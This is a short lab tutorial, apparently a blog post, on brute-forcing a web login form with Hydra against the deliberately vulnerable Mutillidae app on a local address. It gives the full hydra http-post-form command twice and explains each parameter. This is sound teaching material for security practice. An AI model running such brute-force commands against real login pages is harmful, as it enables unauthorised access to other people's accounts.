Brute Force Web Login using Hydra
OS used: Kali LinuxTool Used: hydra/ burp suite
web app: mutillidae
here is the command used in full;
hydra -l admin -P /root/Desktop/work/mutillidae/mutilldae-passwords 192.168.0.9 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
lets break it down
hydra > this is the name of the brute force program
-l admin > this tells the program to check the username admin (this was gained via enumeration earlier)
-P /root/Desktop/work/mutillidae/mutilldae-passwords >this is the path to the password file used
192.168.0.9 > this is the host address (ip) of the server
http-post-form > this is the type of form we are attacking
"/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
"/mutillidae/index.php?page=login.php > this is the parameter to the login page the " is appended to the beginning
to work out the remainder of the command consider the following
:username=^USER^&password=^PASS^&login-php-submit-button=Login
but there is still one more piece of info we need which is
:Not Logged In"
the " is appended to the end the Not Logged In is the result of a user not been logged and is what is presented when you visit the log in page without logging in as shown below
remember these parameters will differ depending on the application used
the command
hydra -l admin -P /root/Desktop/work/mutillidae/mutilldae-passwords 192.168.0.9 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
is now complete and we begin our attack
